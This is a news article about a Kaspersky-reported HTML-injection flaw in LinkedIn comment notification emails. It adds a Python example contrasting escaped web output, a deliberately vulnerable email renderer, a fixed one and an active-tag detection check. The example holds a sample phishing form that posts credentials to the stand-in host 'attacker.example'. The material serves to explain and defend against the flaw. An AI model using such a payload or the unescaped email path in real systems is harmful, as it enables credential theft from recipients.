Social platforms are a big target for attackers. A business-oriented social platform that holds details of millions of business people, along with their titles, colleagues, career information and more, could be extremely vulnerable to attack, says a blog post by Kaspersky Lab.
According to the blog post, it is not difficult to target a user, and exploiting that information is just a single comment away. Injecting a malicious comment into a user's post thread automatically triggers a notification to that user's email account, regardless of the email provider or of the connection relationship between the victim and the attacker. The comment is escaped when the web application renders it, but not when the notification email is built, so HTML in the comment arrives live in the victim's mail client.
“Although it seems that the application server had escaped the dangerous characters, the payload is only escaped from the main application.”
Another scenario might involve embedding an HTML form in the comment to collect information from the victim directly inside the notification email, or redirecting the victim to a site where a malicious executable can be downloaded.
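The flaw described above is an output-encoding inconsistency: one sink (the web page) escapes the comment, another sink (the notification email) does not. The following added example, which is not code from Kaspersky Lab or LinkedIn, reproduces that pattern with constructed templates and a constructed comment payload of the kind the article describes (an HTML form posting to a placeholder hostname, `attacker.example`). The function and template names are assumptions for illustration. It shows the web rendering path escaping correctly, the email path passing the form through live, the fixed email path escaping at its own sink, and a cheap regression check that a notification pipeline could run over its rendered output.

```python
import html
import re

# Constructed sample comment, modelled on the article's description: a benign-looking
# reply carrying an HTML form. The action hostname is a placeholder, not a real site.
MALICIOUS_COMMENT = (
    'Great post! <form action="https://attacker.example/collect" method="post">'
    'Confirm your login: <input name="user"><input name="pass" type="password">'
    '<input type="submit" value="Verify"></form>'
)

# Assumed templates for the two sinks: the web page and the notification email.
WEB_TEMPLATE = '<div class="comment"><p>{body}</p></div>'
EMAIL_TEMPLATE = (
    "<html><body><p>{author} commented on your post:</p>"
    "<blockquote>{body}</blockquote></body></html>"
)

# Tags that make rendered HTML "active" in a mail client: forms, links, inputs and
# remote loads. This is a regression check for the notification pipeline, not a
# substitute for escaping or for a real HTML sanitizer.
ACTIVE_TAG = re.compile(r"<\s*(form|input|a|script|img|iframe|meta)\b", re.IGNORECASE)


def render_web_comment(body: str) -> str:
    """The main application escapes on output: the browser shows the tags as text."""
    return WEB_TEMPLATE.format(body=html.escape(body, quote=True))


def render_email_vulnerable(author: str, body: str) -> str:
    """Notification path that trusts the web layer and interpolates the raw comment.
    The form is live when the recipient opens the email."""
    return EMAIL_TEMPLATE.format(author=html.escape(author, quote=True), body=body)


def render_email_fixed(author: str, body: str) -> str:
    """Same template, but this sink escapes independently of what any other sink did."""
    return EMAIL_TEMPLATE.format(
        author=html.escape(author, quote=True),
        body=html.escape(body, quote=True),
    )


def find_active_tags(rendered: str) -> list:
    """Return the lowercase names of unescaped active tags in a rendered document.
    An escaped comment contributes nothing because '<' became '&lt;'."""
    return [tag.lower() for tag in ACTIVE_TAG.findall(rendered)]


if __name__ == "__main__":
    web = render_web_comment(MALICIOUS_COMMENT)
    bad_mail = render_email_vulnerable("Alice", MALICIOUS_COMMENT)
    good_mail = render_email_fixed("Alice", MALICIOUS_COMMENT)
    print("web page active tags:   ", find_active_tags(web))
    print("vulnerable email tags:  ", find_active_tags(bad_mail))
    print("fixed email tags:       ", find_active_tags(good_mail))
```

The design point is that escaping is a property of each output context, not of the stored data: the comment is stored raw once, and every renderer (web page, email, mobile push, RSS) must encode for its own context. A check such as `find_active_tags` run over every generated notification in a test suite would have flagged the email path before it shipped.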
Last year, security researchers from Kaspersky Lab warned LinkedIn, the world's largest business-oriented social network, about a security issue that could pose a major threat to its 360+ million users. Because LinkedIn attracts so many people in the business community, such a flaw could help attackers efficiently run spear-phishing campaigns, steal credentials and potentially gain remote control over selected victims without needing to resort to social engineering.
LinkedIn engaged with the researchers to remediate the issue and has since issued a fix to the affected platform. "While certain HTML content should be restricted and we have issued a fix and thanked Kaspersky researchers; the likelihood of exploit on popular modern email platforms is unlikely," says David Cintz, Senior Technical Program Manager, LinkedIn security ecosystem.
Some tips to avoid becoming a victim:
* Use an advanced Internet security solution to filter out dangerous redirections to servers that host malware, phishing pages and more. If a solution is already installed, keep it updated at all times.
* An attachment or a link in an email, even from a known party, might contain malicious content. Be very wary before deciding to open it.
* Do not register on social platforms with your corporate email account.